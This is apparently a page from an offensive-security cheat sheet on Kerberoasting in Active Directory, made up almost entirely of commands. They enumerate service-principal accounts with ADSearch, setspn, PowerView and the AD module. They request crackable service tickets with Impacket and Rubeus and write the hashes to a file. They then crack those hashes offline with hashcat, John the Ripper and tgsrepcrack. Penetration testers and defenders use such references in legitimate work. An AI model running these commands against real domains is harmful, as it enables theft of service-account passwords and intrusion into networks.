Kerberoasting

Discovery Kerberos Account

# ADSearch
ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName

# Setspn
PS C:\> setspn -T vulnableone.local -Q */*

# PowerView
Get-DomainUser -SPN | select serviceprincipalname

# AD-Module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Impacket

impacket-GetUserSPNs vulnableone.local/svc:Passvord123 -dc-ip 10.10.10.10 -request

Rubeus

Rubeus.exe kerberoast /simple /nowrap
Rubeus.exe kerberoast /user:svc /nowrap
Rubeus.exe kerberoast /stats
Rubeus.exe kerberoast /rc4opsec /outfile:C:\Users\khan.chanthou\Desktop\hashes.txt
Rubeus.exe kerberoast /rc4opsec /domain:vulnableone.local /outfile:C:\Users\khan.chanthou\Desktop\hashes.txt

Crack Hash

Hashcat

hashcat -m 13100 -a 0 hash.txt /usr/share/wordlist/rockyou.txt

John

kirb2j0hn ticket.kirbi > crackfile
john --format=krb5tgs crackfile --wordlist=10k-worst-pass.txt

Crack with kerberos tool

python /usr/share/kerberoast/tgsrepcrack.py wordlist.txt 1-40a50000-svc@HTTP~WEB.vulnableone.local-VULNABLEONE.LOCAL.kirbi

PreviousKerberos Attack NextASREPRoasting

Last updated 1 year ago